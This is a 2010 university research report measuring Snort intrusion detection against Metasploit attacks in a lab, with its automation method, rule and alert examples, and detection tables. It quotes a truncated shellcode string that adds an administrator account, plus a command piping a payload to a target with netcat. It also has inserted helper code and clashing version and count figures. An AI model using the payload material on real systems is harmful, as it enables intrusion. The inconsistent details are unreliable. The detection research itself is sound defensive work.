IDS Project: Snorting Metasploit

University of Amsterdam, System & Network Engineering

Authors: Kevin de Kok ([email protected]), Niek Timmers ([email protected])
Coordinator: Jeroen van Beek
University of Amsterdam, May 30, 2010




Management Summary

This research project is focused on the effectiveness of Snort against attacks which can be found in Metasploit. Metasploit is a publicly available and easy to use hacker tool which can be used to compromise servers on a network. Within this tool hundreds of attacks can be found which are used to compromise enterprise servers remotely via the network. Snort is an intrusion detection system which is capable of detecting malicious activities on an enterprise network. Thereby Snort could be an effective defense against Metasploit. We want to know how effective Snort really is and if implementing it has additional value to the security of the network.

The effectiveness of Snort is measured as the number of attacks from Metasploit that were detected by it. Detection is done by Snort by known signatures which are defined in rules. These rules contain a string of characters which uniquely identifies an attack. The string matching is done by capturing all messages sent via the network and comparing them with the defined rule set. There are thousands of rules available in Snort for all kinds of software and operating systems. Most rule sets are supplied by Snort but there are also rule sets which are provided by other companies and communities. This research has focused on three different rule sets: the default rule set (3000 rules), the official up-to-date rule set (5000 rules) and a rule set from an active community (14000 rules). By comparing three different rule sets we can give a complete conclusion on the effectiveness of Snort.

The ultimate goal of Metasploit is to stay under the radar of Snort and comparable products. If the attacks in Metasploit were easily detected by Snort, it would make life for hackers a lot harder if Snort were implemented in every network. However, Snort is not implemented in every network and, even worse, Snort is not effective against the attacks found in Metasploit. By default several attacks are detected, but for an attacker it is really easy to hide these attacks. Within Metasploit several tools are included in order to hide the attacks. Our research has shown that hiding is really easy for the part of an attack which is responsible for giving the attacker access to vulnerable servers in the network. Changing this part of the attack can be compared with simple math: 40 + 2 = 42 but also 84 / 2 = 42. The attack looks different but the result is the same.

In order to test the actual effectiveness we have made network packet traces of all the Windows attacks from Metasploit in order to read them with the different Snort rule sets. This whole process was done automatically via a custom developed framework. The outcome of this process was that Snort is not effective against the attacks. Only one out of five attacks was detected in the most effective tested setup. Thereby we conclude that Snort is not capable of protecting a network by itself, but that it is merely an additional brick in the entire security model of a network.

Kevin de Kok, Niek Timmers

May 30, 2010

Contents

1 Introduction
  1.1 Research
  1.2 Approach
  1.3 Lab Setup
  1.4 Targets
  1.5 Attacks

2 Executing the Attacks
  2.1 Introduction to Metasploit
  2.2 Exploits
    2.2.1 Exploit: Automation
  2.3 Payloads
    2.3.1 Payloads: Automation
  2.4 Scanners
    2.4.1 Scanners: Automation
  2.5 Denial of Services
    2.5.1 Denial of Services: Automation
  2.6 Encoders
    2.6.1 Encoders: Automation

3 Detecting the Attacks
  3.1 Introduction to Snort
    3.1.1 Using Snort offline
  3.2 Rules
    3.2.1 Snort
    3.2.2 Emerging Threats
  3.3 Analysing traffic from the Metasploit framework

4 Effectiveness of Snort
  4.1 Effectiveness

5 Hiding Attacks
  5.1 Code Obfuscation
  5.2 Encryption of the Data Stream
  5.3 Fragmented Packets
  5.4 Timing Attacks
  5.5 Slow Down Attack
  5.6 Overloading Snort

6 Conclusion
  6.1 Effectiveness
  6.2 Increase Effectiveness
  6.3 Training Snort
  6.4 Unique Attacks
  6.5 Cat and Mouse
  6.6 Obfuscating

7 Future work
  7.1 Metasploit Rule Set
  7.2 Clean Packet Traces
  7.3 Effect of Rule Parameters

A Exploits - Total: 266
B Payloads - Total: 101
C Scanners - Total: 96
D Denial of Service - Total: 37
E Encoders - Total: 16
F insert rules.rb
G insert attacks.rb
H dump attacks.rb
I dump payloads.rb
J transform payloads.rb
K send payloads.rb
L snort parse pcap
M meta-snort.sh
N honeyd.conf

1 Introduction

Intrusion detection systems[11] (IDS) are used to detect malicious traffic on a network. There are several IDS solutions available; our project will be focused on Snort [1], which is an open source IDS solution. The effectiveness of Snort is determined by its rules. Rules can be written manually but they are also provided and maintained by Snort. It is not unlikely that within a company only these rules are used. Therefore it is important that these rules are effective against all sorts of attacks.

“Hackers” and penetration testers[10] often make use of the Metasploit [2] framework. Within this framework you can find a variety of attacks which are designed to attack an operating system and its services. Roughly all common attacks can be found in Metasploit. Metasploit is an open source solution and available for everyone; therefore you would assume that the attacks should be detected by Snort. During our IDS labs we already concluded that this is clearly not the case. We think it is interesting to see what the actual effectiveness of Snort is against the attacks in Metasploit.

Whether a default installation of Snort is effective against exploits of the Metasploit framework has a clear answer. The question is, however, what a system administrator should do in order to make Snort more effective. One solution is to write rules manually for each attack. Another solution is implementing the rules from a third party like Emerging Threats[3].

It is common practice for “hackers” to use well known executables for attacking their victims. These executables are easily detected by virus scanners. Thereby it is essential to modify these executables in order to hide them from the virus scanner. This approach also applies to the attacks within Metasploit. Viruses and the Metasploit attacks are usually identified by a signature in either the executable or in the payload within the packet. We think it is interesting to know how difficult it is to hide known attacks from Snort.

1.1 Research

The project will be focused on answering the following research question:

What is the effectiveness of Snort against attacks which can be found in Metasploit?

In order to give an accurate and complete answer to the above question we will also give an answer to the following sub questions:

1. Can a default installation of Snort detect attacks from Metasploit?

2. Can Snort be improved by applying 3rd party rules?

3. Can Snort detect attacks which are made undetectable by Metasploit?

4. Is it possible to make Snort more effective against the attacks in Metasploit?


1.2 Approach

The project will contain different stages which need to be completed before going to the next stage. The following stages can be defined:

Stage 1: Identify Targets. The effectiveness of several Snort installations will be tested during this project. Different operating systems and repositories mean different versions of Snort, each with a different rule set. A selection is made of three different versions of Snort, which from now on will be identified as the targets. All targets and their rules are inserted in a database with a custom script.

    snort 2.7.5 / snort 2.8.5 SF / snort 2.8.6 SF + ET
    +--------------+--------------+------+-----+---------+
    | Field        | Type         | Null | Key | Default |
    +--------------+--------------+------+-----+---------+
    | id           | int(10)      | NO   | PRI | NULL    |
    | alert        | varchar(10)  | NO   |     | NULL    |
    | from_address | varchar(20)  | NO   |     | NULL    |
    | from_port    | varchar(10)  | NO   |     | NULL    |
    | relation     | varchar(5)   | NO   |     | NULL    |
    | to_address   | varchar(20)  | NO   |     | NULL    |
    | to_port      | varchar(10)  | NO   |     | NULL    |
    | msg          | varchar(100) | YES  |     | NULL    |
    ...
    | content      | varchar(200) | YES  |     | NULL    |
    | rev          | varchar(5)   | YES  |     | NULL    |
    +--------------+--------------+------+-----+---------+

The different versions of Snort are listed in subsection 1.3.

Stage 2: Identify Attacks. Within Metasploit there are many attacks available. This research has not focused on all attacks but mainly on Windows attacks; however, not all selected attacks are aimed at Windows. The selection is done in order to finish within the project deadline. All attacks are inserted with a custom script in a similar database, where the last three columns are used to insert the sid of the rule that triggered an alert:

    Exploits / Payloads / Dos / Scanners / Encoders
    +-------------+--------------+------+-----+---------+
    | Field       | Type         | Null | Key | Default |
    +-------------+--------------+------+-----+---------+
    | id          | int(10)      | NO   | PRI | NULL    |
    | os          | varchar(10)  | NO   |     | NULL    |
    | type        | varchar(20)  | NO   |     | NULL    |
    | name        | varchar(100) | NO   |     | NULL    |
    | quality     | varchar(20)  | NO   |     | NULL    |
    | description | varchar(200) | NO   |     | NULL    |
    | fedora      | varchar(60)  | YES  |     | NULL    |
    | centos      | varchar(60)  | YES  |     | NULL    |
    | ubuntu      | varchar(60)  | YES  |     | NULL    |
    +-------------+--------------+------+-----+---------+

A list of all exploits can be found in section 2.

Stage 3: Dump Attacks. In order to test all selected attacks against the different targets, a packet trace is made with tcpdump. To automate this process the attacks are retrieved from the database with a custom script and executed accordingly. How this process is done can be found in section 2.

Stage 4: Detect Attacks The packet traces are used to test the attacksagainst the different targets. This will be done automatically with a customscript. All results will be inserted into the database. How this process is donecan be found in section 3.

Stage 5: Retrieve Results All results will be retrieved from the databasewith a custom script. With this information we were able to form several strongconclusions which are actually the crown jewels of this research. How thisprocess is executed can be found in section 4.

1.3 Lab Setup

A lab setup will be used to conduct the research. This lab setup will be created using a Xen environment, which is a powerful open source virtualization platform. Several virtual machines will be created on this platform in order to create different targets for our research.

    Server Role      Operating System Version
    Database Server  Ubuntu 9.04
    Target 1         Ubuntu 8.04
    Target 2         CentOS 5.4
    Target 3         Fedora 12

Table 1: Xen lab setup

1.4 Targets

The focus of this research is on three installations of Snort. The first installation is an installation from the Ubuntu 8.04 repositories, in which there is still an old version of Snort available. The second installation is an installation from the CentOS 5.4 repositories including an up-to-date rule set from SourceFire[4], which is the official supplier of rules. The third installation is a manual installation retrieved from the official Snort website.

    Snort Version  Ruleset                       Nr. of Rules
    Snort 2.7.5    Repository                    3971
    Snort 2.8.5    SourceFire                    5522
    Snort 2.8.6    SourceFire, Emerging Threats  14309

Table 2: Selected Snort installations

1.5 Attacks

This research will be focused on attacks which can be found in Metasploit. The version of Metasploit at the beginning of this research was 3.3.3. The attacks within Metasploit can be divided into the following groups: Exploits, Payloads, Auxiliary, Encoders and Nops. From these attacks several exploits will be selected for this research. A more detailed description of the selected attacks can be found in section 2.


2 Executing the Attacks

All attacks from Metasploit that are included in this project were imported into a MySQL database. The scripts, which were written in Ruby, query the database in order to loop through all the attacks. For every section a different script is made to keep the types of attacks separated. A complete list of the scripts can be found in the appendix.

2.1 Introduction to Metasploit

The Metasploit framework is an open-source project focused on IT security. Within this framework multiple attacks can be found. The following types of attacks can be found in Metasploit version 3.3.3, which was the current version at the beginning of this research:

    + -- --=[ 481 exploits    266 included in this research ]=
    + -- --=[ 192 payloads    101 included in this research ]=
    + -- --=[ 103 scanners     96 included in this research ]=
    + -- --=[  49 dos          37 included in this research ]=
    + -- --=[  22 encoders     16 included in this research ]=
    + -- --=[   8 nops          0 included in this research ]=
    =[ Total Attacks Included: 516 ]=

In order to test the efficiency of Snort against this framework a selection of attacks was made. Not all attacks are included because that scope is simply a bit too big for this project; thereby we have selected mostly Windows attacks. The attacks include exploits, payloads, scanners, denial of services and encoders. Several attacks are excluded because they simply did not execute as expected, so it was not possible to create a genuine trace of them.

The attacks are not fully comparable to each other and thereby should not have the same weight in our results. For example, it is not possible to use the encoders in order to attack a host system; an encoder is used for obfuscating a payload. However, all attacks are treated equally in our statistics because, even if the attacks are not equal, they all result in a compromised system if successful.


2.2 Exploits

An exploit is a piece of code, a sequence of commands or a specific chunk of data that takes advantage of a bug or vulnerability in software in order to gain control over the host system. An exploit makes it possible to execute a payload, which is the actual malicious code that gives the hacker access to the target system. Within Metasploit 481 exploits can be found, of which 250 are Windows exploits. All exploits included in this project are aimed at Windows and applications that run on Windows. A full list of all the exploits included in this project can be found in appendix A.

2.2.1 Exploit: Automation

A Ruby script is responsible for automating the execution of all exploits. For all exploits executed the windows/shell/reverse_tcp payload is used. A tcpdump trace is made by the script. In order to capture the exploit in a tcpdump trace the following steps are executed by the script:

1. Query the database for the list with exploits

2. Create packet trace of the exploit

(a) Open tcpdump and output to a unique file

(b) Start Honeyd with udp/tcp ports 1-65535 open (configuration in appendix N)

(c) Start farpd to direct traffic to a virtual IP address[12]

(d) Execute exploit to the target server

(e) If an attack failed log this to a file.

(f) Kill tcpdump.

3. Go to the next exploit.

All failed exploits are inspected manually. Usually a parameter was not set, thereby failing the exploit. By changing the parameters manually it was still possible to create a packet trace. Sometimes the exploit simply did not work as expected; if this happened, these exploits were excluded from the results. The script can be found in appendix H.

2.3 Payloads

The payloads[8] in Metasploit are shellcodes which are executed when an exploit is successful. A shellcode is a piece of assembly which is called this way because it usually starts a command shell for the attacker. However, shellcode is not limited to starting a shell. Within Metasploit there are 192 payloads, of which 83 are included in this project. All payloads included are Windows payloads. A full list of all the payloads included in this project can be found in appendix B.


2.3.1 Payloads: Automation

The payloads are exported out of Metasploit in a Ruby format (the export script is in appendix I). This format simply contains a variable called buf which holds the shellcode. An example of an exported payload would be:

    buf =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
    "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
    ...
    "\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61" +
    "\x74\x6f\x72\x73\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69" +
    "\x74\x20\x2f\x41\x44\x44\x00"

A simple script (appendix K) is used to send the payload via netcat to the target server. However, in order to do that some changes to the exported payload are needed. A script (appendix J) changes the payload in the following way so it can be executed with Ruby and sent via netcat to the target server:

• Add buf = '' to the top of the file.

• Change buf = to buf +=. This is needed if the payload consists of multiple variables; for example, staged payloads use multiple variables which are all named buf.

• Add puts buf to the end of the file.

The above will result in the following Ruby script for each payload, which can be executed:

    buf = ''
    buf +=
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
    "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
    ...
    "\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61" +
    "\x74\x6f\x72\x73\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69" +
    "\x74\x20\x2f\x41\x44\x44\x00"
    puts buf

When executed, this will output binary data on the terminal. Thereby it is possible to send this binary output via netcat to a specific port on our targets. In order to accomplish this the following command, which pipes the binary output to netcat, is executed for all payloads:

    ruby payload.rb | nc target_server_ip port
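As an added example (not one of the project's scripts), the three edits above in Ruby: SAMPLE_EXPORT is a constructed stand-in for the msfpayload Ruby output, with two `buf =` assignments as a staged payload produces, and the bytes the transformed script would print are recovered from the string literals without evaluating the shellcode text.

```ruby
require 'rbconfig'

# Constructed stand-in for an msfpayload ruby-format export (the real export is
# hundreds of bytes); the two `buf =` assignments mimic a staged payload.
SAMPLE_EXPORT = <<~'RB'
  buf =
  "\x90\x90\x90\x90" +
  "\xeb\xfe"
  buf =
  "\x6e\x65\x74\x20\x75\x73\x65\x72" +
  "\x00"
RB

# The three edits from section 2.3.1: prepend `buf = ''`, turn every `buf =`
# into `buf +=` (so a second assignment appends instead of overwriting the
# first stage), and append `puts buf`.
def transform_payload(export)
  body = export.gsub(/^buf\s*=(?!=)/, 'buf +=')
  "buf = ''\n#{body.rstrip}\nputs buf\n"
end

# Recover the bytes the transformed script prints without evaluating it:
# collect every "\xNN..." literal in source order and decode the escapes.
def payload_bytes(script)
  script.scan(/"((?:\\x\h\h)+)"/).flatten
        .map { |lit| lit.scan(/\\x(\h\h)/).flatten.map(&:hex).pack('C*') }
        .join.b
end

# What `ruby payload.rb` really writes to stdout (and hence to netcat): runs
# the script in a child interpreter. Caveat for anyone comparing traces:
# `puts` appends "\n" unless the buffer already ends with one, so one extra
# byte goes on the wire; `print buf` would send the payload exactly.
def run_payload_script(script)
  IO.popen([RbConfig.ruby, '-e', script], 'rb', &:read)
end

def trailing_newline_added?(script)
  run_payload_script(script) == payload_bytes(script) + "\n"
end
```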

To add it all up, the script is responsible for executing the following steps:


1. Query the database for the list with encoders

2. Create packet trace of the encoded payload

(a) Execute msfpayload to output the payload in Ruby format (see 2.3.1)

(b) Transform the payloads to executable ruby code

(c) Open tcpdump and output to a unique file

(d) Start Honeyd with udp/tcp ports 1-65535 open (configuration in appendix N)

(e) Start farpd to direct traffic to a virtual IP

(f) Send the exploit to the target system with netcat

(g) Log all failed attempts

(h) Kill tcpdump

3. Goto next payload

2.4 Scanners

Within the Metasploit framework there are 103 scanners, which are located in the auxiliary section. Most scanners are developed to scan for a specific vulnerability on certain host machines. An attacker could use these scanners in order to find victims in a network; thereby it is quite important that Snort is able to detect this. A full list of all the scanners included in this project can be found in appendix C.

2.4.1 Scanners: Automation

Of all scanners a trace is made in a similar fashion as for the exploits. The Ruby script which is responsible for the automation is thereby also very similar to the exploit automation script. The script executes the following steps:

1. Query the database for the list with scanners

2. Create packet trace of the scanner

(a) Open tcpdump and output to a unique file

(b) Start Honeyd with udp/tcp ports 1-65535 open (configuration in appendix N)

(c) Start farpd to direct traffic to a virtual IP address[12]

(d) Start scanner to the target server

(e) If a scanner failed log this to a file

(f) Kill tcpdump

3. Goto next scanner

All failed scanners are inspected manually. Usually a parameter was not set,thereby failing the scanner. By changing the parameters manually it was stillpossible to create a packet trace.


2.5 Denial of Services

Denial of service attacks are one of the oldest and most common attacks on a host system. They harm the system in such a way that it cannot function properly or simply crashes. Usually a denial of service sends or executes a specific set of commands or strings against a vulnerable application or system. Within the Metasploit framework there are 49 denial of services, of which 37 are included in this research. A full list of all the denial of services included in this project can be found in appendix D.

2.5.1 Denial of Services: Automation

It was possible to make the traces of the denial of services in a similar way as for the exploits and scanners. The script we made executed the following steps in order to create the traces:

1. Query the database for the list with denial of services

2. Create packet trace of the denial of service

(a) Open tcpdump and output to a unique file

(b) Start Honeyd with udp/tcp ports 1-65535 open (configuration in appendix N)

(c) Start farpd to direct traffic to a virtual IP address[12]

(d) Execute denial of service to the target server

(e) If a denial of service failed log this to a file

(f) Kill tcpdump

3. Goto next denial of service

It was not possible to create clear traces of several denial of services within the Metasploit framework. These failed ones have been excluded from the research.

2.6 Encoders

Encoders are used to obfuscate[5] the payload of an exploit. Within the Metasploit framework there are multiple encoders. It is possible to encode a payload numerous times, which should make it harder to detect. Usually the known payloads are easily detectable by intrusion detection systems. However, by obfuscating the code it is possible to hide these well known payloads from the radar of the intrusion detection system. This research included all encoders, which adds up to a total of 16. A full list of all the encoders included in this project can be found in appendix E.


2.6.1 Encoders: Automation

In order to automate the process of testing the encoders[6][7][9] against Snort, packet traces were made as well. To test the encoders we picked a payload which was detected by all Snort versions and obfuscated this payload with all encoders. Thereby we could test if Snort was still able to detect the payload after it was obfuscated. The script that was responsible for making these traces did that in the following way:

1. Query the database for the list with encoders

2. Create packet trace of the encoded payload

(a) Execute msfpayload to output the payload in Ruby format (see 2.3.1)

(b) Pipe the output to msfencode to obfuscate the payload

(c) Transform the payloads to executable ruby code

(d) Open tcpdump and output to a unique file

(e) Start Honeyd with udp/tcp ports 1-65535 open (configuration in appendix N)

(f) Start farpd to direct traffic to a virtual IP

(g) Send the exploit to the target system with netcat

(h) Log all failed attempts

(i) Kill tcpdump

3. Goto next encoder

There were six encoders not functioning properly. Some of them are already on the Metasploit bug list and planned to be repaired in Metasploit version 3.4.0 [16].


3 Detecting the Attacks

3.1 Introduction to Snort

Snort is an IDS and IPS platform developed by Sourcefire. Snort makes use of protocol analysis and content searching/matching to detect and recognise various network based attacks. It can also detect other attacks and probes such as buffer overflows, port scans, OS fingerprinting and more. The signatures are written as rules. Snort is available in the repositories of almost every Linux distribution. Self-written rules can easily be added to Snort. The detection engine of Snort utilizes a modular plug-in architecture. The primary uses are:

• Packet sniffer

• Packet logger

• Intrusion detection/prevention system

With enhancements from the Open Source community Snort can also be an IPS. Firewalls can block IP addresses based on events from Snort. In this research project Snort is only used to analyse pcap files.

3.1.1 Using Snort offline

Snort can be used as an offline tool to analyse pcap files and parse the content from them. Snort uses its rule set to analyse the pcap file. In the setup Snort is executed with the following command:

    snort -k none -A fast -c /etc/snort/snort.conf -r pcap_file

The "-k none" argument disables checksum verification in Snort; this is needed because the captured network traffic contains other IP addresses than the IP address of the machine Snort is installed on. If checksum verification is enabled a lot of packets remain undetected by Snort. The second argument "-A fast" is the alert mode of Snort; this option writes an alert message to the log file /var/log/snort/alert, which is needed because the alert is used for correlating an attack with a triggered rule. The third argument "-c" is needed to read the Snort configuration file; in this file all the Snort options can be configured, including the rule sets. And the last option "-r" is used to read the pcap file.

3.2 Rules

The rules provided by Sourcefire are developed by the Vulnerability Research Team (VRT). This team does research into the newest exploits, malware and hack attempts and creates rule sets based on those subjects. Below an example of a rule is displayed:


    alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE x86 NOOP"; content:"aaaaaaaaaaaaaaaaaaaaa"; classtype:shellcode-detect; sid:1394; rev:5;)

The latest rules can be bought from Sourcefire; after 30 days those rules are free to download and given to the community.

There are also other Open Source communities which contribute to Snort with their own rules and modifications to Snort. Emerging Threats provides third party rules to integrate into Snort.
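An added example, not one of the project's scripts: parsing a rule like the one above into the columns of the stage-1 rule table from section 1.2 (alert, from_address, from_port, relation, to_address, to_port, msg, content, rev). The second sample rule is constructed to exercise a repeated content option, a `;` inside the quoted msg and a bidirectional header.

```ruby
# The rule printed above, plus a constructed second rule that exercises two
# `content` options, a `;` inside the quoted msg and a bidirectional header.
SAMPLE_RULES = <<~'RULES'
  # comment lines and blank lines are skipped
  alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"SHELLCODE x86 NOOP"; content:"aaaaaaaaaaaaaaaaaaaaa"; classtype:shellcode-detect; sid:1394; rev:5;)

  alert tcp $HOME_NET any <> $EXTERNAL_NET 3306 (msg:"CONSTRUCTED test; two contents"; flow:established; content:"abc"; content:"|00 01|"; sid:9000001; rev:1;)
RULES

# Rule header: action proto src_addr src_port direction dst_addr dst_port (options)
HEADER_RE = /\A(?<action>\w+)\s+(?<proto>\w+)\s+(?<from_address>\S+)\s+(?<from_port>\S+)\s+
             (?<relation>->|<>)\s+(?<to_address>\S+)\s+(?<to_port>\S+)\s*\((?<options>.*)\)\s*\z/mx

# Options are `name:value;` or a bare `name;`; a quoted value may contain ';'.
# Returns name => [values] because `content` may legitimately repeat.
def parse_options(body)
  opts = Hash.new { |h, k| h[k] = [] }
  body.scan(/\s*(\w+)(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?\s*;/) do |name, value|
    value = value.to_s.strip
    value = value[1..-2] if value.length >= 2 && value.start_with?('"') && value.end_with?('"')
    opts[name] << value
  end
  opts
end

# One rule line -> a row shaped like the stage-1 rule table.
def parse_rule(line)
  m = HEADER_RE.match(line.strip)
  raise ArgumentError, "not a Snort rule: #{line.inspect}" unless m
  opts = parse_options(m[:options])
  {
    alert: m[:action], proto: m[:proto],
    from_address: m[:from_address], from_port: m[:from_port],
    relation: m[:relation],
    to_address: m[:to_address], to_port: m[:to_port],
    msg: opts['msg'].first, content: opts['content'],
    classtype: opts['classtype'].first,
    sid: opts['sid'].first&.to_i, rev: opts['rev'].first&.to_i,
  }
end

# A rules file -> rows, skipping comments and blank lines.
def load_rules(text)
  text.each_line.map(&:strip)
      .reject { |l| l.empty? || l.start_with?('#') }
      .map { |l| parse_rule(l) }
end

# Index by sid so an alert's [gid:sid:rev] can be joined back to its rule.
def rules_by_sid(rows)
  rows.each_with_object({}) { |r, h| h[r[:sid]] = r }
end
```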

3.2.1 Snort

In our lab setup we use three installations of Snort: two installations from the repository of the underlying Linux distribution, in which no additional changes are made to the configuration file of Snort and only the provided rules are enabled, and a third, bleeding edge installation with the newest version of Snort, which also has rules from the Open Source community Emerging Threats (ET) applied in its configuration.

The following versions are used:

• Ubuntu 8.04, Snort 2.7.0

• CentOS 5.4, Snort 2.8.6

• Fedora 5, Snort 2.8.6 + ET

The rules provided within the Snort package from the distribution's package repository are used in the setup.

3.2.2 Emerging Threats

Emerging Threats is a community that does its own research into vulnerabilities, malware and other forms of malicious network-related software and attacks. It recently received funding from the Army Research Office and the National Science Foundation to continue developing the project. Emerging Threats also provides a patch for Snort to make the rules compatible with proprietary and open source firewalling mechanisms such as:

• Packet Filter(*BSD)

• Iptables(Linux)

• Cisco ACLs

• Cisco Pix

• Checkpoint

• Microsoft ISA Server

Different Snort events can be translated into firewall rules for the vendors listed above.


3.3 Analysing traffic from the Metasploit framework

To correlate the traffic generated by Metasploit with the rules in the different Snort setups, the following steps are taken to analyse the captured traffic:

(a) Write a starting point to /var/log/snort/alert;

(b) Analyse the pcap file with Snort;

(c) Write the number of alerts to a temporary log file;

(d) Write an end point to /var/log/snort/alert;

(e) Parse the log file /var/log/snort/alert for Snort alert messages;

(f) If an alert was found, write the Snort ID and the name of the attack to the database; otherwise write "NOT DETECTED" to the database.

An example from the /var/log/snort/alert log file is displayed below:

B mysql_login
05/08-22:27:54.251582 [**] [1:2010937:2] ET POLICY Suspicious inbound to mySQL port 3306 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.0.2:38936 -> 172.16.0.4:3306
E mysql_login

Metasploit attack in Snort logfile.

The first line of the log entry starts with the delimiter "B" followed by the exploit name. The second line holds the Snort rule that is triggered by the attack from Metasploit. The triggered Snort rule, 2010937, is added to the database, correlated with the name of the Metasploit attack. Then follows an ending delimiter "E" plus the exploit name. The process of parsing the pcap file with Snort is automated with a script, which is provided in appendix L.


4 Effectiveness of Snort

In this section the effectiveness of Snort is described. The calculation of the effectiveness is based on the number of attacks that are used and on the number of attacks that are detected by Snort.

The percentage of successful detection per attack type is determined by the following formula:

detected_attacks / available_attacks * 100 = detected average

The total effectiveness for each Snort instance is calculated by the following formula:

total_detected_attacks / total_available_attacks * 100 = total_detected average

The average over the successfully detected attacks is calculated by a script. This script queries the database by attack type (exploits, payloads, etc.) and calculates the results. The script can be found in appendix M.
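The steps of section 3.3 and the formulas above, carried out on a small constructed alert log, as an added example (this is not the report's own script from appendix L or M). The first alert line is the one quoted in section 3.3; the other attack names and the sids 9999999 and 9999998 are made up for the example, and the choice to store the first triggered rule when several fire is an assumption, since the report does not say how that case is handled.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of /var/log/snort/alert with the "B"/"E" delimiters that
# the analysis procedure writes around each Metasploit attack. Only the
# mysql_login alert line is taken from the report; the rest is made up.
SAMPLE_ALERT_LOG = """\
B mysql_login
05/08-22:27:54.251582 [**] [1:2010937:2] ET POLICY Suspicious inbound to mySQL port 3306 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.0.2:38936 -> 172.16.0.4:3306
E mysql_login
B example_exploit_one
E example_exploit_one
B example_exploit_two
05/08-22:30:01.000001 [**] [1:9999999:1] CONSTRUCTED TEST alert one [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.0.2:40000 -> 172.16.0.4:445
05/08-22:30:01.000002 [**] [1:9999998:1] CONSTRUCTED TEST alert two [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.0.2:40001 -> 172.16.0.4:445
E example_exploit_two
"""

# Snort "-A fast" alert line: [gid:sid:rev] followed by the rule message.
ALERT_RE = re.compile(r"\[\*\*\]\s+\[(\d+):(\d+):(\d+)\]\s+(.*?)\s+\[\*\*\]")

NOT_DETECTED = "NOT DETECTED"


def parse_alert_log(text: str) -> Dict[str, List[Tuple[int, str]]]:
    """Map each Metasploit attack name to the (sid, message) pairs Snort raised
    between its B and E delimiters; an empty list means nothing fired."""
    results: Dict[str, List[Tuple[int, str]]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        if line.startswith("B "):
            current = line[2:].strip()
            results.setdefault(current, [])
        elif line.startswith("E "):
            if current != line[2:].strip():
                raise ValueError(f"unbalanced delimiters around {line!r}")
            current = None
        elif current is not None:
            m = ALERT_RE.search(line)
            if m:
                results[current].append((int(m.group(2)), m.group(4)))
    if current is not None:
        raise ValueError(f"missing E delimiter for {current}")
    return results


def database_rows(results: Dict[str, List[Tuple[int, str]]]) -> List[Tuple[str, str, str]]:
    """Step (f): one row per attack; 'NOT DETECTED' when no alert fired.
    Assumption: when several rules fire, the first one is stored."""
    rows = []
    for attack, alerts in results.items():
        if alerts:
            sid, msg = alerts[0]
            rows.append((attack, str(sid), msg))
        else:
            rows.append((attack, NOT_DETECTED, NOT_DETECTED))
    return rows


def detection_rate(detected: int, available: int) -> float:
    """detected_attacks / available_attacks * 100, rounded to one decimal."""
    return round(detected / available * 100, 1) if available else 0.0


def rates_by_type(rows: List[Tuple[str, str, str]], attack_types: Dict[str, str]) -> Dict[str, float]:
    """Per-type and total detection rates; attack_types maps attack name -> type."""
    totals: Dict[str, int] = {}
    hits: Dict[str, int] = {}
    for attack, sid, _ in rows:
        t = attack_types.get(attack, "unknown")
        totals[t] = totals.get(t, 0) + 1
        if sid != NOT_DETECTED:
            hits[t] = hits.get(t, 0) + 1
    per_type = {t: detection_rate(hits.get(t, 0), n) for t, n in totals.items()}
    per_type["total"] = detection_rate(sum(hits.values()), sum(totals.values()))
    return per_type
```

Run against a real alert file, parse_alert_log raises on a missing or mismatched E delimiter rather than silently attributing later alerts to the wrong attack, which is the failure a crashed Snort run would otherwise cause in the database.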

4.1 Effectiveness

In this section the overall results are displayed, with the average detection rate of the different versions of Snort. To achieve maximum effectiveness, several Snort options are enabled. The shellcode option in Snort is enabled to check for shellcode in the network traffic on all ports. Shellcode can be found in the payload of the packets; more information about payloads can be found in subsection 2.3. The following preprocessors are enabled:

• stream 5

• http preprocessor

• rpc decoder

• back orifice detector

• ftp normalizer

• telnet normalizer

• smtp normalizer

• portscan normalizer

• dns preprocessor

The stream5 preprocessor is used to detect TCP packets with invalid flag combinations; this preprocessor also detects different types of port scans. The HTTP preprocessor is used to detect possibly invalid HTTP traffic. Furthermore the RPC decoder is enabled to detect exploits (section 2.2) on the DCOM ports by decoding SMB traffic. The Back Orifice decoder is used to detect Back Orifice attacks. The FTP and Telnet preprocessors are used for packet inspection on their streams: they check FTP commands and responses and can also detect anomalies and buffer overflows in Telnet traffic. The SMTP normalizer checks the SMTP commands for possible buffer overflows. The portscan normalizer is configured to detect port scans. Furthermore the DNS preprocessor is used to detect exploits against DNS. The last part of the configuration consists of all Snort rules being enabled. The number of loaded rules differs per setup; section 1.4 gives an overview of the loaded rules. With these options enabled Snort is configured for the highest possible detection rate.

Attack type   Total attacks   Detected attacks   Average detected
Exploits      266             48                 18%
Payloads      101             15                 15%
DoS            37              1                  2%
Scanners       96              0                  0%
Encoders       16              1                  6.3%
Total         516             65                 12.6%

Effectiveness of Snort 2.7.0

Attack type   Total attacks   Detected attacks   Average detected
Exploits      266             22                 8.3%
Payloads      101             14                 13.9%
DoS            37              2                  5.4%
Scanners       96              9                  9.4%
Encoders       16              1                  6.3%
Total         516             48                 9.3%

Effectiveness of Snort 2.8.6


Attack type   Total attacks   Detected attacks   Average detected
Exploits      266             62                 23.3%
Payloads      101             27                 26.7%
DoS            37              2                  5.4%
Scanners       96              9                  9.4%
Encoders       16              1                  6.3%
Total         516            101                 19.6%

Effectiveness of Snort 2.8.6 + ET

